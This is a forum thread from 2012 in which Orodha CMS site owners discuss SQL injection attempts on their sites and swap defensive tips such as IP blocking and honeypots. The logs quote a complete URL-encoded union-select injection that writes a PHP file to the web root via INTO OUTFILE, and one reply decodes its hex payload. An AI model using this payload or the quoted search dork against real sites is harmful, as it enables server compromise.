Banner
ORODHA 1.1.1 RELEASED!   click here!
Page: 1 2 » Last

Orodha 1.1.1 attacked

#1 Top Mar-15-12 06:04:35

Orodha 1.1.1 attacked

The last 2 days all sites we have made with orodha  1.1.1 attacked.

Only one site with SQL queries

Query String: select_users_lang=en%27%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2Fnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C0x6A7573745F615F746573745F34355F73696E676C655F305F736C6173685F315F3C3F706870206563686F286D643528226A7573745F615F746573742229293B6563686F2840756E6C696E6B28222F6A6174657374372E7068702229203F2022756E222E226C696E6B656422203A20226E6F745F756E222E226C696E6B656422293F3E%2F%2A%2A%2Finto%2F%2A%2A%2Foutfile%2F%2A%2A%2F%27%2Fjatest7.php%27%2F%2A

The 1500 times attacked by the ip 121.254.168.16

The error we receive is:

Crashed by User at IP --> 121.254.168.16 ON March 15, 2012, 1:46:13 am

SQL Error Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,n' at line 1

SQL statement that failed below:

---------------------------------------------------------

SELECT pagesmain_title FROM altra_en'/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0x6A7573745F615F746573745F34355F73696E676C655F305F736C6173685F315F3C3F706870206563686F286D643528226A7573745F615F746573742229293B6563686F2840756E6C696E6B28222F6A6174657374372E7068702229203F2022756E222E226C696E6B656422203A20226E6F745F756E222E226C696E6B656422293F3E/**/into/**/outfile/**/'/jatest7.php'/*_pagesmain WHERE pagesmain_id='3'



---------------------------------------------------------



ERROR REPORT domain.net: March 15, 2012, 1:46:13 am



---------------------------------------------------------

Server Type: Apache/2.2.3 (CentOS)

Request Method: GET

Query String: select_users_lang=en%27%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2Fnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C0x6A7573745F615F746573745F34355F73696E676C655F305F736C6173685F315F3C3F706870206563686F286D643528226A7573745F615F746573742229293B6563686F2840756E6C696E6B28222F6A6174657374372E7068702229203F2022756E222E226C696E6B656422203A20226E6F745F756E222E226C696E6B656422293F3E%2F%2A%2A%2Finto%2F%2A%2A%2Foutfile%2F%2A%2A%2F%27%2Fjatest7.php%27%2F%2A

User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)

Request URI: /index.html?select_users_lang=en%27%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2Fnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C0x6A7573745F615F746573745F34355F73696E676C655F305F736C6173685F315F3C3F706870206563686F286D643528226A7573745F615F746573742229293B6563686F2840756E6C696E6B28222F6A6174657374372E7068702229203F2022756E222E226C696E6B656422203A20226E6F745F756E222E226C696E6B656422293F3E%2F%2A%2A%2Finto%2F%2A%2A%2Foutfile%2F%2A%2A%2F%27%2Fjatest7.php%27%2F%2A

POST Variables: array (
)

GET Variables: array (
  'select_users_lang' => 'en\'/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0x6A7573745F615F746573745F34355F73696E676C655F305F736C6173685F315F3C3F706870206563686F286D643528226A7573745F615F746573742229293B6563686F2840756E6C696E6B28222F6A6174657374372E7068702229203F2022756E222E226C696E6B656422203A20226E6F745F756E222E226C696E6B656422293F3E/**/into/**/outfile/**/\'/jatest7.php\'/*',
  'printer_friendly' => false,
  'action' => 'index',
  'PageID' => 1,
)

orodhamaniak
useravatar
Offline
5 Posts
User info in posts
Administrator has disabled public posting
#2 Top Mar-16-12 12:10:19

Re: Orodha 1.1.1 attacked

I'm no expert on the subject, but it looks like an SQL injection attack where a hacker is trying to dump the contents of the users table into a file called jatest7.php.

Search your website and look for the file  jatest7.php. If it's there I would download it and see if they were successful in obtaining the user data before I deleted it from the server.

Since all of the attacks are coming from the same IP address I would also block that IP using my Firewall settings or in the htaccess file.

If you decode the hexadecimal to string you get this:

Code:


?just_a_test_45_single_0_slash_1_<?php echo(md5("just_a_test"));echo(@unlink("/jatest7.php") ? "un"."linked" : "not_un"."linked")?>

Now that I look at that I think the UNLINK deletes the jatest7.php file if it was created.

Look in your user database to see if there is a username "just_a_test". If it's there you need to delete it. But if I was you and did find it I would look at the settings for that user and see if they were able to give themselves admin privileges.

skosloff
Contributor
ranks
useravatar
Offline
359 Posts
User info in posts
Administrator has disabled public posting
#3 Top Mar-16-12 01:27:09

Re: Orodha 1.1.1 attacked

Yes, it is an attack.  It forced me close down one of my sites.  I hope someone can find a way to close these ***** out.

cheers,

simon132
useravatar
Offline
19 Posts
User info in posts
Administrator has disabled public posting
#4 Top Mar-16-12 03:38:21

Re: Orodha 1.1.1 attacked

simon132 wrote:

Yes, it is an attack.  It forced me close down one of my sites.  I hope someone can find a way to close these ***** out.

cheers,

Remember, the problem is not Orodha. This is a standard attack on PHP sites looking for vulnerabilities to get into the database. From what was posted above it does not look like they got to the database.

If you see the IP address is consistent just block that IP address. Most of these hackers don't even use proxy servers anymore.

skosloff
Contributor
ranks
useravatar
Offline
359 Posts
User info in posts
Administrator has disabled public posting
#5 Top Mar-16-12 04:16:36

Re: Orodha 1.1.1 attacked

The attacks stopped last 24 hours
The attacks was for onesite from ip 88.43.235.239
And the other by the ip 121.254.168.16.
The site does not destroy them
The file does not exist in jatest7.php site.
Something must be done to prevent this.

orodhamaniak
useravatar
Offline
5 Posts
User info in posts
Administrator has disabled public posting
#6 Top Mar-16-12 09:05:15

Re: Orodha 1.1.1 attacked

orodhamaniak wrote:

The attacks stopped last 24 hoursThe site does not destroy them

I don't know what that means.

orodhamaniak wrote:

Something must be done to prevent this.

You can block IP's or set up a honeypot to try and trap those kinds of events. Other than that, how do you prevent someone or a bot from visiting your web site? Orodha can't do that. You have to set the traps of the IP filters.

Did they manage to successfully add their user to the database? Even if you don't see a new user, look through the Orodha site log to see if they created a user then deleted it.

You should also talk to your web host about preventing attacks on your sites. If you are using a shared hosting service they might not do much for you. But if you lease your own server they might provide some decent help.

Hack attacks just plain suck. We have dozens of sites and see hack attempts all of the time. We use some honeypot trapping techniques on most sites, plus we outright ban blocks of IP addresses. Yes, I realize some people are strongly against doing things like that. But places like China, Russia, North Korea, and the Baltic States are not our intended audience - especially China. I don't have a guilty conscience blocking those IP's.

If your database was hacked then it proves Orodha is vulnerable and needs to be locked down better to prevent those types of attacks. But I don't think their hack was successful. They were just using a bot to randomly test for vulnerabilities.

skosloff
Contributor
ranks
useravatar
Offline
359 Posts
User info in posts
Administrator has disabled public posting
#7 Top Mar-20-12 02:46:25

Re: Orodha 1.1.1 attacked

I think these lamers may find Orodha sites using google search (such as inurl:?action=view_agents) so if Orodha users change these url's they may not find Orodha sites so easily.

emlakcilik
useravatar
Offline
2 Posts
User info in posts
Administrator has disabled public posting
#8 Top Mar-20-12 08:48:47

Re: Orodha 1.1.1 attacked

I've had the same type of attacks for over six months to my Joomla and Orodha sites. They have try to use server enviroments to use my send mail for spam.
None have damaged or taken down any of our sites or hacked the database. My only solution had been to block IP with the  htacess file. I gave up trying to block a single IP. Now I block the whole range. Most of the attacks are from China or  Europe.

If you are using Joomla try some of the login failure module which send you an email with the user name and IP address when someone try to login and it fails.   While it had some secuirty problems User Trace for Joomla was a great module for checking visitors. It would be a great type of addon for Orodha!

Charlie

RECS
useravatar
Offline
8 Posts
User info in posts
Administrator has disabled public posting
#9 Top Mar-20-12 09:32:37

Re: Orodha 1.1.1 attacked

RECS wrote:

I've had the same type of attacks for over six months to my Joomla and Orodha sites. They have try to use server enviroments to use my send mail for spam.

With a Joomla site I suggest using something like sh404SEF. Not only is it a nice tool for SEF URL's and a host of other features, but it also helps fend off some basic spammer attacks.

skosloff
Contributor
ranks
useravatar
Offline
359 Posts
User info in posts
Administrator has disabled public posting
#10 Top Apr-18-12 04:18:48

Re: Orodha 1.1.1 attacked

Hack Attempts!

I just sat and watch someone trying to hack my site with a Brute Force Hack. If you using the default user name or any part of it you could change it immediately.
600 attempts in just a few seconds  using the default  user name and random numbers and names. I shut down the site to stop the  attacks.
Last week the hack attempts were dealing with phpadmin on the server.

Charlie

RECS
useravatar
Offline
8 Posts
User info in posts
Administrator has disabled public posting
Page: 1 2 » Last

Board Info

Board Stats:
 
Total Topics:
885
Total Polls:
0
Total Posts:
33558345
Posts this week:
24
User Info:
 
Total Users:
840
Newest User:
Soifer
Members Online:
0
Guests Online:
69

Online: 
There are no members online

Forum Legend:

 Topic
 New
 Locked
 Sticky
 Active
 New/Active
 New/Locked
 New Sticky
 Locked/Active
 Active/Sticky
 Sticky/Locked
 Sticky/Active/Locked